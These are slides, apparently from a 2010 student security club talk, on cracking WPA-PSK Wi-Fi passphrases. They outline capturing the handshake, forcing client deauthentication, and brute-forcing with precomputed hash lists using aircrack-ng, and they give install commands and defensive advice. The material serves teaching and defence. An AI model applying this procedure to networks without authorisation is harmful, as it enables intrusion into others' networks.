Cracking WPA 03/24/2010 UTDCSG What is WPA? Wi-Fi Protected Access - encryption for wireless networks WEP has design flaws that allow 100% cracking given enough time (usually 5-15 minutes). WPA - temporary fix for WEP's flaws; still uses RC4 WPA2 - finalized WPA 8 to 63 characters hashed 4096 times 256 bits AES WPA-PSK Weaknesses WPA-PSK still requires a 4-way handshake to authenticate a wireless client. If using WPA-PSK as opposed to radius, this handshake contains the passphrase as the PMK(pairwise master key) in the form of a 256 bit hash created using the SSID as the SALT and hashing the passphrase 4096 times. Therefore, hashing our own passphrase and comparing it to the captured PMK hash(brute forcing) will tell us if our passphrase is the same as the passphrase needed to connect to the WPA-PSK encrypted network. Attack Outline 1. Record wireless traffic between client and AP 2. Disconnect the client to force a handshake or capture a handshake by waiting 3. Import pre-hashed word list(churchofwifi.org) OR import a wordlist and create the hashes for them while importing 4. Crack the passphrase by comparing hashes with the hash captured in the handshake Tools Needed Aircrack-ng - a set of tools for auditing wireless networks Airodump-ng --- wireless packet capture tool Aireplay-ng --- wireless packet injection tool Airolib-ng --- manage and create WPA/WPA2 pre- computed hashes Note: Aircrack-ng must be compiled with support for sqlite make sqlite=true make sqlite=true install Compile Aircrack-ng for Ubuntu Run the following commands in a terminal to install Aircrack with support for sqlite for Ubuntu. The last two lines will be needed if you had aircrack-ng installed via aptitude. wget http://download.aircrack-ng.org/aircrack-ng-1.0.tar.gz tar -xzf aircrack-ng-1.0.tar.gz cd aircrack-ng-1.0 make sqlite=true make sqlite=true install ln -s /usr/local/bin/aircrack-ng /usr/bin/aircrack-ng ln -s /usr/local/bin/airolib-ng /usr/bin/airolib-ng Resources Used Aircrack aircrack-ng.org Pre-hashed 1,000,000 word list for top 1000 ESSIDs hak5.org/forums/index.php?showtopic=12708 Slides, Videos, Questions / Comments utdcsg.org How to Prevent WPA Cracking The only way to be 99% sure nobody will crack your WPA- PSK passphrase is to use WPA with a radius server instead of WPA-PSK! WPA with a radius server means the client has to provide the correct username and password and accounts can be locked after unsuccessful login attempts. WPA-PSK can be strengthened by using a passphrase longer than 30 characters, but with a fast enough computer or a cloud computing network it is just a matter of time before your passphrase is brute forced.